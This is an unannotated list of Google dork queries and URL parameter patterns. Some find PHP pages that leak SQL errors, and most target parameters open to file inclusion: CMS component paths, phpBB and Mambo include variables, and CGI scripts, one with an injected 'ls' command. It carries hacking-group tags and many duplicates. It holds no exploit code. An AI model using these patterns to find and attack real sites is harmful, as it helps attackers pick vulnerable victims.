inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?*[*]*=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
indishell.in
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?*[*]*=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?*[*]*=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?*[*]*=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=
index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?*[*]*=
index.php?ev=
pagina.php?pre=
nota.php?content=
include.php?adresa=
sitio.php?t=
index.php?sivu=
principal.php?q=
path.php?ev=
print.php?module=
index.php?loc=
nota.php?basepath=
padrao.php?tipo=
index2.php?in=
principal.php?eval=
file.php?qry=
info.php?t=
enter.php?play=
general.php?var=
principal.php?s=
standard.php?pagina=
standard.php?subject=
base.php?second=
head.php?inc=
pagina.php?basepath=
main.php?pname=
*inc*.php?modo=
include.php?goto=
file.php?pg=
head.php?g=
general.php?header=
start.php?*root*=
enter.php?pref=
index3.php?open=
start.php?module=
main.php?load=
enter.php?pg=
padrao.php?redirect=
pagina.php?my=
gery.php?pre=
enter.php?w=
info.php?texto=
enter.php?open=
base.php?rub=
gery.php?*[*]*=
include.php?cmd=
standard.php?dir=
layout.php?page=
index3.php?pageweb=
include.php?numero=
path.php?destino=
index3.php?home=
default.php?seite=
path.php?eval=
base.php?choix=
template.php?cont=
info.php?pagina=
default.php?x=
default.php?option=
gery.php?ki=
down*.php?second=
blank.php?path=
pagina.php?v=
file.php?pollname=
index3.php?var=
layout.php?goto=
pagina.php?incl=
home.php?action=
include.php?oldal=
indishell.in
print.php?left=
print.php?u=
nota.php?v=
home.php?str=
press.php?panel=
page.php?mod=
default.php?param=
down*.php?texto=
mod*.php?dir=
view.php?where=
blank.php?subject=
path.php?play=
base.php?l=
index2.php?rub=
general.php?opcion=
layout.php?xlink=
padrao.php?name=
pagina.php?nivel=
default.php?oldal=
template.php?k=
main.php?chapter=
layout.php?chapter=
layout.php?incl=
include.php?url=
base.php?sivu=
index.php?link=
sub*.php?cont=
info.php?oldal=
general.php?rub=
default.php?str=
head.php?ev=
sub*.php?path=
view.php?page=
main.php?j=
index2.php?basepath=
gery.php?qry=
main.php?url=
default.php?incl=
show.php?redirect=
index1.php?pre=
general.php?base_dir=
start.php?in=
show.php?abre=
index1.php?home=
home.php?ev=
index2.php?ki=
base.php?pag=
default.php?ir=
general.php?qry=
index2.php?home=
press.php?nivel=
enter.php?pr=
blank.php?loader=
start.php?cmd=
padrao.php?d=
sitio.php?recipe=
principal.php?read=
standard.php?showpage=
main.php?pg=
page.php?panel=
press.php?addr=
template.php?s=
main.php?tipo=
*inc*.php?ev=
padrao.php?page=
show.php?thispage=
home.php?secao=
main.php?start=
enter.php?mid=
press.php?id=
main.php?inc=
index3.php?cmd=
index.php?pname=
press.php?subject=
include.php?sec=
index3.php?xlink=
general.php?texto=
index3.php?go=
index.php?cmd=
index3.php?disp=
index3.php?left=
sub*.php?middle=
show.php?modo=
index1.php?pagina=
head.php?left=
enter.php?phpbb_root_path=
show.php?z=
start.php?basepath=
blank.php?strona=
template.php?y=
page.php?where=
layout.php?category=
index1.php?my=
principal.php?phpbb_root_path=
nota.php?channel=
page.php?choix=
start.php?xlink=
home.php?k=
standard.php?phpbb_root_path=
principal.php?middlePart=
mod*.php?m=
index.php?recipe=
template.php?path=
pagina.php?dir=
sitio.php?abre=
index1.php?recipe=
blank.php?page=
sub*.php?category=
*inc*.php?body=
enter.php?middle=
home.php?path=
down*.php?pre=
base.php?w=
main.php?path=
nota.php?ir=
press.php?link=
gery.php?pollname=
down*.php?open=
down*.php?pageweb=
default.php?eval=
view.php?showpage=
show.php?get=
sitio.php?tipo=
layout.php?cont=
default.php?destino=
padrao.php?seccion=
down*.php?r=
main.php?param=
standard.php?e=
down*.php?in=
nota.php?include=
sitio.php?secao=
print.php?my=
general.php?abre=
general.php?link=
default.php?id=
standard.php?panel=
show.php?channel=
enter.php?r=
index3.php?phpbb_root_path=
gery.php?where=
head.php?middle=
sub*.php?load=
gery.php?sp=
show.php?chapter=
sub*.php?b=
general.php?adresa=
print.php?goto=
sub*.php?sp=
template.php?doshow=
padrao.php?base_dir=
index2.php?my=
include.php?w=
start.php?op=
main.php?section=
view.php?header=
layout.php?menue=
head.php?y=
sub*.php?content=
show.php?type=
base.php?id=
mod*.php?qry=
default.php?strona=
sitio.php?chapter=
gery.php?index=
nota.php?h=
page.php?oldal=
enter.php?panel=
blank.php?t=
start.php?pollname=
sub*.php?module=
enter.php?thispage=
mod*.php?index=
sitio.php?r=
sub*.php?play=
index2.php?doshow=
index2.php?chapter=
show.php?path=
gery.php?to=
info.php?base_dir=
gery.php?abre=
gery.php?pag=
view.php?channel=
default.php?mod=
index.php?op=
general.php?pre=
padrao.php?type=
template.php?pag=
standard.php?pre=
blank.php?ref=
down*.php?z=
general.php?inc=
home.php?read=
pagina.php?section=
default.php?basepath=
index.php?pre=
sitio.php?pageweb=
base.php?seite=
*inc*.php?j=
index2.php?filepath=
file.php?type=
index1.php?oldal=
index2.php?second=
index3.php?sekce=
info.php?filepath=
base.php?opcion=
path.php?category=
index3.php?start=
start.php?rub=
*inc*.php?i=
blank.php?pre=
general.php?channel=
index2.php?OpenPage=
page.php?section=
mod*.php?middle=
index1.php?goFile=
blank.php?action=
principal.php?loader=
sub*.php?op=
main.php?addr=
start.php?mid=
gery.php?secao=
pagina.php?tipo=
index.php?w=
head.php?where=
principal.php?tipo=
press.php?loader=
gery.php?showpage=
gery.php?go=
enter.php?start=
press.php?lang=
general.php?p=
index.php?sekce=
index2.php?get=
sitio.php?go=
include.php?cont=
sub*.php?where=
index3.php?index=
path.php?recipe=
info.php?loader=
print.php?sp=
page.php?phpbb_root_path=
path.php?body=
principal.php?menue=
print.php?cont=
pagina.php?z=
default.php?mid=
blank.php?xlink=
sub*.php?oldal=
general.php?b=
include.php?left=
print.php?sivu=
press.php?OpenPage=
default.php?cont=
general.php?pollname=
template.php?nivel=
enter.php?page=
file.php?middle=
standard.php?str=
gery.php?get=
main.php?v=
down*.php?subject=
enter.php?sivu=
path.php?option=
index.php?strona=
index1.php?choix=
index2.php?f=
press.php?destino=
pagina.php?channel=
principal.php?b=
home.php?include=
head.php?numero=
general.php?ref=
main.php?dir=
gery.php?cont=
principal.php?type=
file.php?param=
default.php?secao=
path.php?pageweb=
info.php?r=
base.php?phpbb_root_path=
main.php?itemnav=
view.php?pg=
pagina.php?choix=
default.php?itemnav=
index2.php?cmd=
layout.php?url=
index.php?path=
index1.php?second=
start.php?modo=
index1.php?get=
index3.php?my=
sub*.php?left=
print.php?inc=
view.php?type=
path.php?*[*]*=
base.php?adresa=
index3.php?oldal=
standard.php?body=
base.php?path=
principal.php?strona=
info.php?l=
template.php?left=
head.php?loc=
page.php?ir=
print.php?path=
down*.php?path=
sitio.php?opcion=
pagina.php?category=
press.php?menu=
index2.php?pref=
sitio.php?incl=
show.php?ki=
index3.php?x=
page.php?strona=
*inc*.php?open=
index3.php?secao=
standard.php?*[*]*=
template.php?basepath=
standard.php?goFile=
index2.php?ir=
file.php?modo=
gery.php?itemnav=
main.php?oldal=
down*.php?showpage=
start.php?destino=
blank.php?rub=
path.php?ir=
layout.php?var=
index1.php?texto=
start.php?pg=
index1.php?showpage=
info.php?go=
path.php?load=
index3.php?abre=
blank.php?where=
info.php?start=
page.php?secao=
nota.php?pag=
nota.php?second=
index2.php?to=
standard.php?name=
start.php?strona=
mod*.php?numero=
press.php?home=
info.php?z=
mod*.php?path=
blank.php?base_dir=
base.php?texto=
nota.php?secc=
index.php?tipo=
index.php?goto=
print.php?pag=
view.php?secao=
general.php?strona=
show.php?my=
page.php?e=
padrao.php?index=
gery.php?thispage=
start.php?base_dir=
default.php?tipo=
gery.php?panel=
standard.php?ev=
standard.php?destino=
general.php?middle=
main.php?basepath=
standard.php?q=
index1.php?tipo=
mod*.php?choix=
template.php?ir=
show.php?adresa=
general.php?mid=
index3.php?adresa=
pagina.php?sec=
template.php?secao=
home.php?w=
general.php?content=
sub*.php?recipe=
main.php?category=
enter.php?viewpage=
main.php?ir=
show.php?pageweb=
principal.php?ir=
default.php?pageweb=
index.php?oldal=
head.php?d=
gery.php?mid=
index.php?type=
standard.php?j=
show.php?oldal=
enter.php?link=
enter.php?content=
blank.php?filepath=
standard.php?channel=
base.php?*[*]*=
info.php?incl=
down*.php?include=
press.php?modo=
file.php?choix=
press.php?type=
blank.php?goto=
index3.php?showpage=
principal.php?subject=
start.php?chapter=
show.php?r=
pagina.php?thispage=
general.php?chapter=
page.php?base_dir=
page.php?qry=
show.php?incl=
page.php?*[*]*=
main.php?h=
file.php?seccion=
default.php?pre=
principal.php?index=
principal.php?inc=
home.php?z=
pagina.php?in=
show.php?play=
nota.php?subject=
default.php?secc=
default.php?loader=
padrao.php?var=
mod*.php?b=
default.php?showpage=
press.php?channel=
pagina.php?ev=
sitio.php?name=
page.php?option=
press.php?mid=
down*.php?corpo=
view.php?get=
print.php?thispage=
principal.php?home=
show.php?param=
standard.php?sivu=
index3.php?panel=
include.php?play=
path.php?cmd=
file.php?sp=
template.php?section=
view.php?str=
blank.php?left=
nota.php?lang=
path.php?sivu=
main.php?e=
default.php?ref=
start.php?seite=
default.php?inc=
print.php?disp=
home.php?h=
principal.php?loc=
index3.php?sp=
gery.php?var=
sub*.php?base_dir=
path.php?middle=
pagina.php?str=
base.php?play=
base.php?v=
sitio.php?sivu=
unknown.soldier
main.php?r=
file.php?nivel=
start.php?sivu=
template.php?c=
general.php?second=
sub*.php?mod=
home.php?loc=
head.php?corpo=
standard.php?op=
index2.php?inc=
info.php?pref=
base.php?basepath=
print.php?basepath=
*inc*.php?m=
base.php?home=
layout.php?strona=
padrao.php?url=
sitio.php?oldal=
pagina.php?read=
index1.php?go=
standard.php?s=
page.php?eval=
index.php?j=
pagina.php?pr=
start.php?secao=
template.php?*[*]*=
nota.php?get=
index3.php?link=
home.php?e=
gery.php?name=
nota.php?eval=
sub*.php?abre=
index2.php?load=
principal.php?in=
view.php?load=
mod*.php?action=
default.php?p=
head.php?c=
template.php?viewpage=
view.php?mid=
padrao.php?addr=
view.php?go=
file.php?basepath=
home.php?pre=
include.php?goFile=
layout.php?play=
index1.php?subject=
info.php?middlePart=
down*.php?pg=
sub*.php?body=
index.php?option=
sub*.php?chapter=
default.php?t=
head.php?opcion=
nota.php?panel=
sitio.php?left=
show.php?include=
pagina.php?start=
head.php?choix=
index3.php?tipo=
index3.php?choix=
down*.php?channel=
base.php?pa=
nota.php?sekce=
show.php?l=
show.php?index=
blank.php?url=
start.php?thispage=
nota.php?play=
show.php?second=
enter.php?include=
principal.php?middle=
main.php?where=
padrao.php?link=
path.php?strona=
index3.php?read=
mod*.php?module=
standard.php?viewpage=
standard.php?pr=
*inc*.php?showpage=
pagina.php?ref=
path.php?pname=
padrao.php?mid=
info.php?eval=
include.php?path=
page.php?subject=
sub*.php?qry=
head.php?module=
nota.php?opcion=
head.php?abre=
base.php?str=
home.php?body=
gery.php?module=
head.php?sivu=
page.php?inc=
pagina.php?header=
mod*.php?v=
home.php?doshow=
padrao.php?n=
index1.php?chapter=
padrao.php?basepath=
index.php?r=
index3.php?seccion=
sitio.php?mid=
index.php?where=
general.php?type=
pagina.php?goto=
page.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?body=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?body=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?body=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?body=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path="
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir="
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
com_extended_registration
smarty_config.php?root_dir= "smarty"
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= "send_reminders.php?includedir="
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg"
[Script Path]/admin/index.php?o= admin/index.php";
/admin/index.php?o= admin/index.php";
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= "admin"
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard"
components/com_simpleboard/image_upload.php?sbp= com_simpleboard"
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefix
dotproject/modules/projects/addedit.php?root_dir=
dotproject/modules/projects/view.php?root_dir=
dotproject/modules/projects/vw_files.php?root_dir=
dotproject/modules/tasks/addedit.php?root_dir=
dotproject/modules/tasks/viewgantt.php?root_dir=
My_eGery/public/displayCategory.php?basepath=
modules/My_eGery/public/displayCategory.php?basepath=
modules/4nAlbum/public/displayCategory.php?basepath=
modules/coppermine/themes/default/theme.php?THEME_DIR=
modules/agendax/addevent.inc.php?agendax_path=
modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=
modules/xgery/upgrade_album.php?GERY_BASEDIR=
modules/coppermine/include/init.inc.php?CPG_M_DIR=
shoutbox/expanded.php?conf=
library/editor/editor.php?root=
library/lib.php?root=
e107/e107_handlers/secure_img_render.php?p=
main.php?x=
*default.php?page=
*default.php?body=
*index.php?url=
*index.php?arquivo=
index.php?include=
index.php?visualizar=
index.php?pagina=
index.php?page=
index.php?p=
index.php?cont=
index.php?x=
index.php?cat=
index.php?site=
index.php?configFile=
index.php?do=
index2.php?x=
Index.php?id=
template.php?pagina
inc/step_one_tables.php?server_inc=
GradeMap/index.php?page=
admin.php?cal_dir=
path_of_cpcommerce/_functions.php?prefix=
contacts.php?cal_dir=
convert-date.php?cal_dir=
album_portal.php?phpbb_root_path=
mainfile.php?MAIN_PATH=
dotproject/modules/files/index_table.php?root_dir=
gery/init.php?HTTP_POST_VARS=
pm/lib.inc.php?pm_path=
ideabox/include.php?gorumDir=
cgi-bin/index.cgi?page=
cgi-bin/awstats.pl?update=1&logfile=
cgi-bin/awstats/awstats.pl?configdir
cgi-bin/ikonboard.cgi
cgi-bin/acart/acart.pl?&page=
cgi-bin/quikstore.cgi?category=
cgi-bin/ubb/ubb.cgi?g=
cgi-bin/hinsts.pl?
cgi-bin/bp/bp-lib.pl?g=
ccbill/whereami.cgi?g=ls
cgi-bin/telnet.cgi
cgi-bin/1/cmd.cgi
calendar.pl?command=login&fromTemplate=
encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=
events.cgi?t=
powerup.cgi?a=latest&t=
lc.cgi?a=
news.cgi?a=114&t=
biznews.cgi?a=33&t=
jobs.cgi?a=9&t=
articles.cgi?a=34&t=
events.cgi?a=155&t=
latinbitz.cgi?t=
newsdesk.cgi?t=
media.cgi?a=11&t=
reporter.cgi?t=
news.cgi?t=
newsupdate.cgi?a=latest&t=
deportes.cgi?a=latest&t=
news.cgi?a=latest&t=
whereami.cgi?g=id
auktion.pl?menue=
i-m/i-m.cgi?p=
vote.pl?action=show&id=
shop.pl/page=
newsdesk.cgi?a=latest&t=
fileseek.cgi?head=&foot=
cgi-bin/probe.cgi?olddat=
emsgb/easymsgb.pl?print=
app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=
csv_db/csv_db.cgi?fil e=file.extention
cgi-bin/jammail.pl?job=showoldmail&mail=
cgi-bin/bbs/read.cgi?file=
support_page.cgi?file_name=
index.php?include=
index.php?open=
index.php?visualizar=
main.php?x=
main.php?page=
index.php?meio.php=
index.php?page=
index.php?action=
index5.php?configFile=
index5.php?page=
index5.php?content=
index5.php?x=
index5.php?open=
index5.php?m=
index5.php?site=
index5.php?cat=
index.php?d=
index.php?a=
index.php?b=
index.php?c=
index.php?e=
index.php?f=
index.php?g=
index.php?h=
index.php?i=
index.php?j=
index.php?k=
index.php?l=
index.php?m=
index.php?n=
index.php?o=
index.php?p=
index.php?q=
index.php?r=
index.php?s=
index.php?t=
index.php?u=
index.php?v=
index.php?x=
indishell.in
index.php?y=
index.php?z=
index.php?loc=
index.php?seite=
index2.php?d=
index2.php?a=
index.php?ir=
index.php?secao=
index2.php?b=
index2.php?c=
index2.php?e=
index2.php?f=
index2.php?g=
index2.php?h=
index2.php?i=
index2.php?j=
index2.php?k=
index2.php?l=
index2.php?m=
index2.php?n=
index2.php?o=
index2.php?p=
index2.php?q=
index2.php?r=
index2.php?s=
index2.php?t=
index2.php?u=
index2.php?v=
index2.php?x=
index2.php?y=
index2.php?z=
index5.php?inc=
index5.php?pg=
index5.php?lv1=
index.php?sub=
index.php?sub2=
index.php?pg=
index.php?lv1=
index.php?directfile=
index.php?funcion=
index.php?ll=
index.php?lnk=
index5.php?main=
index5.php?include=
index5.php?root=
index5.php?pagina=
index.php?theme=
index.php?acao=
index5.php?cont=
index5.php?pag=
index5.php?p=
index5.php?lang=
index5.php?language=
template.php?pagina=
llindex.php?sub=
index2.php?pg=
index2.php?lv1=
index2.php?sub=
index2.php?directfile=
index2.php?funcion=
index2.php?sub2=
index2.php?ll=
index2.php?lnk=
index5.php?body=
index5.php?visualizar=
index5.php?do=
index2.php?theme=
index2.php?acao=
index2:php?aa=
index3:php?aa=
index.php?server=
index.php?cal=
index.php?prefix=
index.php?root_PATH=
index.php?path=
index.php?gorumdir=
index2.php?cont=
index2.php?server=
index2.php?cal=
index2.php?prefix=
index2.php?root_PATH=
index2.php?path= AKI
exibir.php?abre=
exibir.php?page=
exibir.php?get=
